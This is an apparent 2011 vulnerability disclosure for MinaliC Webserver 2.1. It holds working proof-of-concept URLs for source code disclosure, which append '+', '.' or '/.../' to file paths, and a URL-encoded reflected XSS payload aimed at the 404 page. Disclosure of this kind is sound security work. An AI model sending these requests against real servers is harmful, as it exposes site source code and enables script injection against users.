=============================================================
                                                             
      /      \   0-Exploit (Zer0 Thunder)                   
   \ \ ,,  /  /--------------------------------------------
    '-.`\()/`.-'          ===========================        
   .--_'(  )'_--.   MinaliC Webserver SCD & XSS Vulnerbilty           
  / /` /`**`\ `\ \       Tested on 	: Windows XP /sp3          
   |  |  ><  |  |        Date 		: 28/07/2011                                  
   \ \     /  /                                            
       '.__.'                                                
                                                            
=============================================================


Source Code Disclosure
----------------------
There is Source Code Discloser vulnerability in MinaliC Webserver, which can be exploited by malicious people to disclose potentially sensitive information.

The vulnerability is caused due to a validation error of the filename extension supplied by the user in the URL. This can be exploited to retrieve the source code of script files from the server via specially crafted requests containing dot, space and slash characters.

The vulnerability has been confirmed in version 2.1 Other versions may also be affected.

Source Code Disclosure PoC's
- http://localhost:8080/index.htm+
- http://localhost:8080/index.htm.
- http://localhost:8080/index.htm/.../
- http://localhost:8080/.../index.htm



Cross Site Scripting 
---------------------
In MinaliC Webserver there is a XSS Vulnerablity, the XSS Vulnerablity is based in the 404 page which will alow us to insert html code trough to URL.

 XSS PoC
- http://localhost:8080/%3CBODY%20ONLOAD=alert%28%27XSS%27%29%3E/ 	[Result 404]




E-mail : neonwarlock@live.com
Site/blog : zt-security.com